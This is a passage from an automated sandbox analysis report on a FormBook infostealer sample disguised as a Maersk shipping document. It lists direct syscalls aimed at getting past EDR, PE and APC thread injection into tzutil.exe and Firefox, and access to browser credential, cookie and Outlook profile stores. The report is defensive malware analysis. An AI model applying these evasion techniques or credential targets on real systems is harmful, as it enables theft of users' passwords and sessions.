                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01798B50 mov eax, dword ptr fs:[00000030h]3_2_01798B50
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01854BB0 mov eax, dword ptr fs:[00000030h]3_2_01854BB0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01854BB0 mov eax, dword ptr fs:[00000030h]3_2_01854BB0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0184EBD0 mov eax, dword ptr fs:[00000030h]3_2_0184EBD0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CEB20 mov eax, dword ptr fs:[00000030h]3_2_017CEB20
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CEB20 mov eax, dword ptr fs:[00000030h]3_2_017CEB20
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182CBF0 mov eax, dword ptr fs:[00000030h]3_2_0182CBF0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CEBFC mov eax, dword ptr fs:[00000030h]3_2_017CEBFC
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01874B00 mov eax, dword ptr fs:[00000030h]3_2_01874B00
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A8BF0 mov eax, dword ptr fs:[00000030h]3_2_017A8BF0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A8BF0 mov eax, dword ptr fs:[00000030h]3_2_017A8BF0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A8BF0 mov eax, dword ptr fs:[00000030h]3_2_017A8BF0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181EB1D mov eax, dword ptr fs:[00000030h]3_2_0181EB1D
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181EB1D mov eax, dword ptr fs:[00000030h]3_2_0181EB1D
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181EB1D mov eax, dword ptr fs:[00000030h]3_2_0181EB1D
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181EB1D mov eax, dword ptr fs:[00000030h]3_2_0181EB1D
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181EB1D mov eax, dword ptr fs:[00000030h]3_2_0181EB1D
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181EB1D mov eax, dword ptr fs:[00000030h]3_2_0181EB1D
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181EB1D mov eax, dword ptr fs:[00000030h]3_2_0181EB1D
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181EB1D mov eax, dword ptr fs:[00000030h]3_2_0181EB1D
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181EB1D mov eax, dword ptr fs:[00000030h]3_2_0181EB1D
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01868B28 mov eax, dword ptr fs:[00000030h]3_2_01868B28
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01868B28 mov eax, dword ptr fs:[00000030h]3_2_01868B28
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A0BCD mov eax, dword ptr fs:[00000030h]3_2_017A0BCD
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A0BCD mov eax, dword ptr fs:[00000030h]3_2_017A0BCD
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A0BCD mov eax, dword ptr fs:[00000030h]3_2_017A0BCD
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C0BCB mov eax, dword ptr fs:[00000030h]3_2_017C0BCB
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C0BCB mov eax, dword ptr fs:[00000030h]3_2_017C0BCB
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C0BCB mov eax, dword ptr fs:[00000030h]3_2_017C0BCB
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01836B40 mov eax, dword ptr fs:[00000030h]3_2_01836B40
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01836B40 mov eax, dword ptr fs:[00000030h]3_2_01836B40
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0BBE mov eax, dword ptr fs:[00000030h]3_2_017B0BBE
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0BBE mov eax, dword ptr fs:[00000030h]3_2_017B0BBE
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0186AB40 mov eax, dword ptr fs:[00000030h]3_2_0186AB40
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01848B42 mov eax, dword ptr fs:[00000030h]3_2_01848B42
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01854B4B mov eax, dword ptr fs:[00000030h]3_2_01854B4B
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01854B4B mov eax, dword ptr fs:[00000030h]3_2_01854B4B
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01872B57 mov eax, dword ptr fs:[00000030h]3_2_01872B57
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01872B57 mov eax, dword ptr fs:[00000030h]3_2_01872B57
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01872B57 mov eax, dword ptr fs:[00000030h]3_2_01872B57
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01872B57 mov eax, dword ptr fs:[00000030h]3_2_01872B57
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0184EB50 mov eax, dword ptr fs:[00000030h]3_2_0184EB50
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_01874A80 mov eax, dword ptr fs:[00000030h]3_2_01874A80
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DCA6F mov eax, dword ptr fs:[00000030h]3_2_017DCA6F
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DCA6F mov eax, dword ptr fs:[00000030h]3_2_017DCA6F
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DCA6F mov eax, dword ptr fs:[00000030h]3_2_017DCA6F
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0A5B mov eax, dword ptr fs:[00000030h]3_2_017B0A5B
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017B0A5B mov eax, dword ptr fs:[00000030h]3_2_017B0A5B
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A6A50 mov eax, dword ptr fs:[00000030h]3_2_017A6A50
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A6A50 mov eax, dword ptr fs:[00000030h]3_2_017A6A50
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A6A50 mov eax, dword ptr fs:[00000030h]3_2_017A6A50
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A6A50 mov eax, dword ptr fs:[00000030h]3_2_017A6A50
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A6A50 mov eax, dword ptr fs:[00000030h]3_2_017A6A50
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A6A50 mov eax, dword ptr fs:[00000030h]3_2_017A6A50
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A6A50 mov eax, dword ptr fs:[00000030h]3_2_017A6A50
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DCA38 mov eax, dword ptr fs:[00000030h]3_2_017DCA38
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C4A35 mov eax, dword ptr fs:[00000030h]3_2_017C4A35
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017C4A35 mov eax, dword ptr fs:[00000030h]3_2_017C4A35
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017CEA2E mov eax, dword ptr fs:[00000030h]3_2_017CEA2E
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DCA24 mov eax, dword ptr fs:[00000030h]3_2_017DCA24
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0182CA11 mov eax, dword ptr fs:[00000030h]3_2_0182CA11
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DAAEE mov eax, dword ptr fs:[00000030h]3_2_017DAAEE
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017DAAEE mov eax, dword ptr fs:[00000030h]3_2_017DAAEE
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A0AD0 mov eax, dword ptr fs:[00000030h]3_2_017A0AD0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D4AD0 mov eax, dword ptr fs:[00000030h]3_2_017D4AD0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D4AD0 mov eax, dword ptr fs:[00000030h]3_2_017D4AD0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017F6ACC mov eax, dword ptr fs:[00000030h]3_2_017F6ACC
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017F6ACC mov eax, dword ptr fs:[00000030h]3_2_017F6ACC
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017F6ACC mov eax, dword ptr fs:[00000030h]3_2_017F6ACC
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A8AA0 mov eax, dword ptr fs:[00000030h]3_2_017A8AA0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017A8AA0 mov eax, dword ptr fs:[00000030h]3_2_017A8AA0
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017F6AA4 mov eax, dword ptr fs:[00000030h]3_2_017F6AA4
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0184EA60 mov eax, dword ptr fs:[00000030h]3_2_0184EA60
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017D8A90 mov edx, dword ptr fs:[00000030h]3_2_017D8A90
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181CA72 mov eax, dword ptr fs:[00000030h]3_2_0181CA72
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_0181CA72 mov eax, dword ptr fs:[00000030h]3_2_0181CA72
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017AEA80 mov eax, dword ptr fs:[00000030h]3_2_017AEA80
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017AEA80 mov eax, dword ptr fs:[00000030h]3_2_017AEA80
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017AEA80 mov eax, dword ptr fs:[00000030h]3_2_017AEA80
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017AEA80 mov eax, dword ptr fs:[00000030h]3_2_017AEA80
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeCode function: 3_2_017AEA80 mov eax, dword ptr fs:[00000030h]3_2_017AEA80
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtQueryVolumeInformationFile: Direct from: 0x76F12F2CJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtQuerySystemInformation: Direct from: 0x76F148CCJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtAllocateVirtualMemory: Direct from: 0x76F148ECJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtQueryAttributesFile: Direct from: 0x76F12E6CJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtReadVirtualMemory: Direct from: 0x76F12E8CJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtCreateKey: Direct from: 0x76F12C6CJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtSetInformationThread: Direct from: 0x76F12B4CJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtClose: Direct from: 0x76F12B6C
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtAllocateVirtualMemory: Direct from: 0x76F13C9CJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtWriteVirtualMemory: Direct from: 0x76F1490CJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtCreateUserProcess: Direct from: 0x76F1371CJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtTerminateThread: Direct from: 0x76F12FCCJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtCreateFile: Direct from: 0x76F12FECJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtOpenFile: Direct from: 0x76F12DCCJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtQueryInformationToken: Direct from: 0x76F12CACJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtAllocateVirtualMemory: Direct from: 0x76F12BECJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtDeviceIoControlFile: Direct from: 0x76F12AECJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtSetInformationThread: Direct from: 0x76F063F9Jump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtOpenSection: Direct from: 0x76F12E0CJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtMapViewOfSection: Direct from: 0x76F12D1CJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtResumeThread: Direct from: 0x76F136ACJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtCreateMutant: Direct from: 0x76F135CCJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtWriteVirtualMemory: Direct from: 0x76F12E3CJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtNotifyChangeKey: Direct from: 0x76F13C2CJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtProtectVirtualMemory: Direct from: 0x76F07B2EJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtProtectVirtualMemory: Direct from: 0x76F12F9CJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtSetInformationProcess: Direct from: 0x76F12C5CJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtOpenKeyEx: Direct from: 0x76F12B9CJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtQueryInformationProcess: Direct from: 0x76F12C26Jump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtResumeThread: Direct from: 0x76F12FBCJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtDelayExecution: Direct from: 0x76F12DDCJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtReadFile: Direct from: 0x76F12ADCJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtQuerySystemInformation: Direct from: 0x76F12DFCJump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeNtAllocateVirtualMemory: Direct from: 0x76F12BFCJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeMemory written: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: NULL target: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeSection loaded: NULL target: C:\Windows\SysWOW64\tzutil.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\tzutil.exeThread register set: target process: 2652Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\tzutil.exeThread APC queued: target process: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeProcess created: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe "C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe"Jump to behavior
                Source: C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: FeNbdhmZHKN.exe, 00000005.00000002.2537251713.0000000000C41000.00000002.00000001.00040000.00000000.sdmp, FeNbdhmZHKN.exe, 00000005.00000000.1813450738.0000000000C40000.00000002.00000001.00040000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000000.1962461804.0000000001951000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: FeNbdhmZHKN.exe, 00000005.00000002.2537251713.0000000000C41000.00000002.00000001.00040000.00000000.sdmp, FeNbdhmZHKN.exe, 00000005.00000000.1813450738.0000000000C40000.00000002.00000001.00040000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000000.1962461804.0000000001951000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: FeNbdhmZHKN.exe, 00000005.00000002.2537251713.0000000000C41000.00000002.00000001.00040000.00000000.sdmp, FeNbdhmZHKN.exe, 00000005.00000000.1813450738.0000000000C40000.00000002.00000001.00040000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000000.1962461804.0000000001951000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: FeNbdhmZHKN.exe, 00000005.00000002.2537251713.0000000000C41000.00000002.00000001.00040000.00000000.sdmp, FeNbdhmZHKN.exe, 00000005.00000000.1813450738.0000000000C40000.00000002.00000001.00040000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000000.1962461804.0000000001951000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: yProgram Manager
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeQueries volume information: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.MAERSK LINE SHIPPING DOC_4253.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.MAERSK LINE SHIPPING DOC_4253.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2537167858.0000000001360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1893908938.0000000001AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2536674826.0000000000E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2536855237.0000000000E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1894488760.0000000001C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\tzutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.MAERSK LINE SHIPPING DOC_4253.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.MAERSK LINE SHIPPING DOC_4253.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2537167858.0000000001360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1893908938.0000000001AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
